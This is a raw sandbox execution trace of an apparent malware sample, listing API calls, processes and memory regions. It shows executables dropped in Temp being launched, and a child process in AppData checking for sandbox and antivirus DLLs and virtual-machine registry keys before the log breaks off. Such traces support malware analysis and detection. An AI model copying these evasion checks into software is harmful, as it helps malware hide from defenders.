MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0220.117] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0220.297] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0220.453] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0220.577] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0220.740] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0220.941] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0221.109] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0221.241] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0221.463] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0221.576] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0221.780] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0222.106] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0222.590] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0222.773] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0222.949] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0223.214] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0223.418] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0223.615] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0223.896] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0224.187] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0224.387] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0224.703] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x102 [0242.341] MsgWaitForMultipleObjectsEx (nCount=0x0, pHandles=0x0, dwMilliseconds=0x64, dwWakeMask=0xff, dwFlags=0x4) returned 0x0 [0258.624] PeekMessageW (in: lpMsg=0x4e1f774, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x4e1f774) returned 1 [0258.625] IsWindow (hWnd=0x5021e) returned 1 [0258.627] GetModuleHandleW (lpModuleName="user32.dll") returned 0x773b0000 [0258.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="DefWindowProcW", cchWideChar=14, lpMultiByteStr=0x4e1f684, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DefWindowProcW\x0fptÃ\x03ÌDþÓqT÷á\x04\x01", lpUsedDefaultChar=0x0) returned 14 [0258.627] GetProcAddress (hModule=0x773b0000, lpProcName="DefWindowProcW") returned 0x77a125dd [0258.628] SetWindowLongW (hWnd=0x5021e, nIndex=-4, dwNewLong=2007049693) returned 76417846 [0258.628] SetClassLongW (hWnd=0x5021e, nIndex=-24, dwNewLong=2007049693) returned 0x48e0b36 [0258.628] IsWindow (hWnd=0x5021e) returned 1 [0258.629] DestroyWindow (hWnd=0x5021e) returned 1 [0258.631] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0258.632] UnregisterClassW (lpClassName=".NET-BroadcastEventWindow.4.0.0.0.3ce0bb8.0", hInstance=0x400000) returned 1 [0258.632] SetConsoleCtrlHandler (HandlerRoutine=0x48e0b0e, Add=0) returned 1 [0258.632] SetEvent (hEvent=0x368) returned 1 [0258.633] CoGetContextToken (in: pToken=0x4e1fabc | out: pToken=0x4e1fabc) returned 0x0 [0258.633] IUnknown:QueryInterface (in: This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4e1fae0 | out: ppvObject=0x4e1fae0*=0x6ee4bc) returned 0x0 [0258.633] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x4e1fb0c | out: pThreadType=0x4e1fb0c*=0) returned 0x0 [0258.633] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0258.633] CoUninitialize () Thread: id = 133 os_tid = 0xf14 Thread: id = 134 os_tid = 0xf18 Thread: id = 136 os_tid = 0xf28 Thread: id = 159 os_tid = 0xf48 [0245.260] CoGetContextToken (in: pToken=0x615fc34 | out: pToken=0x615fc34) returned 0x0 [0245.261] IUnknown:QueryInterface (in: This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x615fc58 | out: ppvObject=0x615fc58*=0x6ee4bc) returned 0x0 [0245.261] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x615fc84 | out: pThreadType=0x615fc84*=0) returned 0x0 [0245.261] IUnknown:Release (This=0x6ee4bc) returned 0x1 Thread: id = 164 os_tid = 0xf64 Thread: id = 165 os_tid = 0xf68 [0229.335] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0229.336] ResetEvent (hEvent=0x250) returned 1 Thread: id = 166 os_tid = 0xf6c [0230.465] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0230.470] ShellExecuteExW (in: pExecInfo=0x25c0be8*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", lpParameters=0x0, lpDirectory="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x25c0be8*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\88.exe", lpParameters=0x0, lpDirectory="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x544)) returned 1 [0252.807] CoGetContextToken (in: pToken=0x5aef75c | out: pToken=0x5aef75c) returned 0x0 [0252.810] CoUninitialize () Thread: id = 168 os_tid = 0xf78 Thread: id = 202 os_tid = 0xc90 [0254.088] CoGetContextToken (in: pToken=0x597f73c | out: pToken=0x597f73c) returned 0x0 [0254.088] IUnknown:QueryInterface (in: This=0x6ee4b0, riid=0x71ddb24c*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x597f760 | out: ppvObject=0x597f760*=0x6ee4bc) returned 0x0 [0254.088] IComThreadingInfo:GetCurrentThreadType (in: This=0x6ee4bc, pThreadType=0x597f78c | out: pThreadType=0x597f78c*=0) returned 0x0 [0254.088] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0254.088] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 Thread: id = 203 os_tid = 0xc8c [0255.486] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0255.488] ShellExecuteExW (in: pExecInfo=0x25d4324*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe", lpParameters=0x0, lpDirectory="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x25d4324*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\99.exe", lpParameters=0x0, lpDirectory="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x590)) returned 1 [0256.822] CoGetContextToken (in: pToken=0x5e0fa3c | out: pToken=0x5e0fa3c) returned 0x0 [0256.823] CoUninitialize () Process: id = "9" image_name = "cdieedr" filename = "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr" page_root = "0xc3d3000" os_pid = "0xed8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "6" os_parent_pid = "0xea0" cmd_line = "C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr " cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2471 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2472 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2473 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2474 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2475 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 2476 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 2477 start_va = 0x400000 end_va = 0x4d3fff monitored = 1 entry_point = 0x423db0 region_type = mapped_file name = "cdieedr" filename = "\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr") Region: id = 2478 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2479 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2480 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2481 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2482 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2483 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2484 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2485 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2486 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2487 start_va = 0x400000 end_va = 0x408fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2488 start_va = 0x240000 end_va = 0x2bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 2489 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2490 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2491 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2492 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2493 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2494 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2495 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 2496 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2497 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 2498 start_va = 0x2c0000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2499 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2500 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2501 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2502 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2503 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2504 start_va = 0x1a0000 end_va = 0x206fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2505 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2506 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2507 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 2508 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 2509 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2510 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2511 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2512 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2513 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2514 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2515 start_va = 0x2c0000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 2516 start_va = 0x360000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 2517 start_va = 0x410000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 2518 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2519 start_va = 0x510000 end_va = 0x697fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 2520 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2521 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2522 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 2523 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2524 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2525 start_va = 0x6a0000 end_va = 0x820fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006a0000" filename = "" Region: id = 2526 start_va = 0x830000 end_va = 0x1c2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000830000" filename = "" Region: id = 2527 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 2528 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2529 start_va = 0x1c30000 end_va = 0x1daffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2557 start_va = 0x210000 end_va = 0x215fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2558 start_va = 0x220000 end_va = 0x224fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 2560 start_va = 0x2c0000 end_va = 0x2d5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002c0000" filename = "" Region: id = 2561 start_va = 0x2f0000 end_va = 0x2fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Thread: id = 104 os_tid = 0xedc [0149.966] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="kernel32" | out: DestinationString="kernel32") [0149.966] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x769b0000) returned 0x0 [0149.967] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="user32" | out: DestinationString="user32") [0149.967] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x773b0000) returned 0x0 [0150.078] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="advapi32" | out: DestinationString="advapi32") [0150.078] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x76c20000) returned 0x0 [0150.078] RtlInitUnicodeString (in: DestinationString=0x18ff54, SourceString="shell32" | out: DestinationString="shell32") [0150.078] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x18ff5c | out: BaseAddress=0x18ff5c*=0x75cb0000) returned 0x0 [0150.084] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0150.085] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x414758 [0150.085] GetKeyboardLayoutList (in: nBuff=1, lpList=0x414758 | out: lpList=0x414758) returned 1 [0150.085] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18fb14 | out: TokenHandle=0x18fb14*=0x74) returned 1 [0150.085] GetTokenInformation (in: TokenHandle=0x74, TokenInformationClass=0x19, TokenInformation=0x18fb18, TokenInformationLength=0x14, ReturnLength=0x18fb10 | out: TokenInformation=0x18fb18, ReturnLength=0x18fb10) returned 1 [0150.085] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x18fd54, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0150.085] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0150.087] CreateFileMappingW (hFile=0x78, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x7c [0150.087] MapViewOfFile (hFileMappingObject=0x7c, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1c30000 [0150.089] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18fd58, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\cdieedr")) returned 0x2a [0150.089] wcsstr (_Str="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\cdieedr", _SubStr="7869.vmt") returned 0x0 [0150.089] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x18ff54, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x18ff54, ResultLength=0x0) returned 0x0 [0150.089] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x18ff5c, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x18ff5c, ReturnLength=0x0) returned 0x0 [0150.090] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0150.090] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0150.090] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0150.090] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x414768 [0150.090] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0150.090] RtlInitUnicodeString (in: DestinationString=0x18ff28, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0150.090] NtOpenKey (in: KeyHandle=0x18ff48, DesiredAccess=0x9, ObjectAttributes=0x18ff30*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x18ff48*=0x80) returned 0x0 [0150.090] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0150.090] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x414878 [0150.090] NtQueryKey (in: KeyHandle=0x80, KeyInformationClass=0x2, KeyInformation=0x414878, Length=0x2c, ResultLength=0x18ff50 | out: KeyInformation=0x414878, ResultLength=0x18ff50) returned 0x0 [0150.090] NtEnumerateKey (in: KeyHandle=0x80, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x18ff50 | out: KeyInformation=0x0, ResultLength=0x18ff50) returned 0xc0000023 [0150.091] LocalAlloc (uFlags=0x40, 